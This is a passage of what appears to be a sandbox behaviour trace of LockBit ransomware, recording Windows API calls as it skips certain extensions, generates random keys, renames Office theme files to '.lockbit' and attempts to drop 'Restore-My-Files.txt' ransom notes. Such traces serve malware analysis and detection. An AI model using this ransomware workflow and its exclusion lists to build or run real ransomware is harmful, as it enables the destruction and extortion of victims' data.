(pszPath="Slipstream.xml") returned=".xml" [0196.044] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0196.045] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Slipstream.xml") returned -1 [0196.046] lstrcmpiW (lpString1="ntldr", lpString2="Slipstream.xml") returned -1 [0196.046] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Slipstream.xml") returned -1 [0196.046] lstrcmpiW (lpString1="bootsect.bak", lpString2="Slipstream.xml") returned -1 [0196.046] lstrcmpiW (lpString1="autorun.inf", lpString2="Slipstream.xml") returned -1 [0196.046] lstrcmpiW (lpString1="thumbs.db", lpString2="Slipstream.xml") returned 1 [0196.046] lstrcmpiW (lpString1="iconcache.db", lpString2="Slipstream.xml") returned -1 [0196.046] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0196.046] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Slipstream.xml") returned=".xml" [0196.046] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.046] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.047] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0196.047] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0196.047] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Slipstream.xml.lockbit") returned 88 [0196.048] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Slipstream.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\slipstream.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.049] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.049] malloc (_Size=0x40068) returned 0x3df0008 [0196.049] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3608) returned 1 [0196.049] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.050] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.050] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.050] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.053] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Slipstream.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Slipstream.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.053] malloc (_Size=0xc6) returned 0x1fa2ed8 [0196.053] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0196.054] free (_Block=0x1fa2ed8) [0196.055] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Slipstream.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0196.055] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0196.055] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.055] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc1bdd00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc1bdd00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xee9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Solstice.xml", cAlternateFileName="")) returned 1 [0196.055] lstrcmpiW (lpString1=".", lpString2="Solstice.xml") returned -1 [0196.055] lstrcmpiW (lpString1="..", lpString2="Solstice.xml") returned -1 [0196.055] PathFindExtensionW (pszPath="Solstice.xml") returned=".xml" [0196.055] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0196.055] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0196.055] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0196.055] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0196.055] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0196.055] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0196.055] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0196.055] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0196.055] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0196.055] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0196.055] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0196.055] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0196.055] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0196.056] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0196.057] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0196.057] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0196.057] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0196.057] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0196.057] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.057] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0196.057] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0196.057] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0196.057] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0196.057] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Solstice.xml") returned -1 [0196.057] lstrcmpiW (lpString1="ntldr", lpString2="Solstice.xml") returned -1 [0196.057] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Solstice.xml") returned -1 [0196.057] lstrcmpiW (lpString1="bootsect.bak", lpString2="Solstice.xml") returned -1 [0196.057] lstrcmpiW (lpString1="autorun.inf", lpString2="Solstice.xml") returned -1 [0196.057] lstrcmpiW (lpString1="thumbs.db", lpString2="Solstice.xml") returned 1 [0196.057] lstrcmpiW (lpString1="iconcache.db", lpString2="Solstice.xml") returned -1 [0196.057] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0196.057] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Solstice.xml") returned=".xml" [0196.057] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.057] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.057] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0196.057] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0196.057] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0196.057] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0196.057] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0196.058] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0196.058] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Solstice.xml.lockbit") returned 86 [0196.058] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Solstice.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\solstice.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0196.063] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.063] malloc (_Size=0x40068) returned 0x1ff1e60 [0196.063] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3817) returned 1 [0196.063] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.064] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0196.064] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.064] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0196.064] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.067] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Solstice.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Solstice.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.067] malloc (_Size=0xc2) returned 0x1fa2ed8 [0196.067] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0196.068] free (_Block=0x1fa2ed8) [0196.068] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Solstice.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0196.068] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0196.069] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.069] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd4d0a00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfd4d0a00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe13, dwReserved0=0x0, dwReserved1=0x0, cFileName="Technic.xml", cAlternateFileName="")) returned 1 [0196.069] lstrcmpiW (lpString1=".", lpString2="Technic.xml") returned -1 [0196.069] lstrcmpiW (lpString1="..", lpString2="Technic.xml") returned -1 [0196.069] PathFindExtensionW (pszPath="Technic.xml") returned=".xml" [0196.069] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0196.069] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0196.069] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0196.069] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0196.069] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0196.069] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0196.069] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0196.069] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0196.069] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0196.069] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0196.069] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0196.069] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0196.069] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0196.069] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0196.069] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0196.070] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0196.071] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0196.071] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0196.071] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0196.071] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0196.071] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.071] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0196.071] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0196.071] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0196.071] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0196.071] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Technic.xml") returned -1 [0196.071] lstrcmpiW (lpString1="ntldr", lpString2="Technic.xml") returned -1 [0196.071] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Technic.xml") returned -1 [0196.071] lstrcmpiW (lpString1="bootsect.bak", lpString2="Technic.xml") returned -1 [0196.071] lstrcmpiW (lpString1="autorun.inf", lpString2="Technic.xml") returned -1 [0196.071] lstrcmpiW (lpString1="thumbs.db", lpString2="Technic.xml") returned 1 [0196.071] lstrcmpiW (lpString1="iconcache.db", lpString2="Technic.xml") returned -1 [0196.071] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0196.071] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Technic.xml") returned=".xml" [0196.071] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.071] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.071] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0196.071] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0196.072] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0196.073] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0196.073] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Technic.xml.lockbit") returned 85 [0196.073] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Technic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\technic.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, 